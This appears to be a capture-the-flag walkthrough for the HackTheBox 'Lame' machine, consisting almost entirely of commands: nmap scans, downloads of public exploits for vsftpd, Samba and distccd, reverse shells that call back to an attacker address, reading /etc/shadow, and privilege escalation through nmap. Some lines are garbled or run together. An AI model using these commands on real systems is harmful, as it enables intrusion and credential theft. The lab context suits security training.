HackTheBox: Lame

  1. Port Scan
nmap -Pn <ip>
nmap -Pn -p- <ip>
,
nmap -A -p-3632 <ip>
nmap --script vuln <ip>
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
  1. FTP
ftp <ip>
ls
searchsploit vsftpd 
wget https://raw.githubusercontent.com/In2econd/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py
python3 vsftpd_234_exploit.py <ip> <port> whoami
smbclient //10.10.10.3/anonymous
wget https://raw.githubusercontent.com/macha97/exploit-smb-3.0.20/master/exploit-smb-3.0.20.py
msfvenom -p cmd/unix/reverse_netcat LHOST=<ip> LPORT=1234 -f python
nc -lvp 1234
python exploit-smb-3.0.20.py
id
python -c 'import pty;pty.spawn("/bin/bash");'
searchsploit distcc
wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py
python distccd_rce_CVE-0224-2687.py -t <ip> -p 3632 -c whoami
nc -lvp 1234
python distccd_rce_CVE-0224-2687.py -t <ip> -p 3632 -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'
python distccd_rce_CVE-0224-2687.py -t <ip> -p 3632 -c 'nc -e /bin/sh <attacker ip> 1234'
id
python -c 'import pty;pty.spawn("/bin/bash");'
ls -l /etc/passwd
sudo -l
cat /etc/shadow
find / 2>>/dev/null | grep "shadow"
cat /var/backups/shadow.bak
find / -perm -u=s -type -f 2>/dev/null
nmap --interactive!sh
idwhoami
cd /home/makiscat user.txt
cd /rootcat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store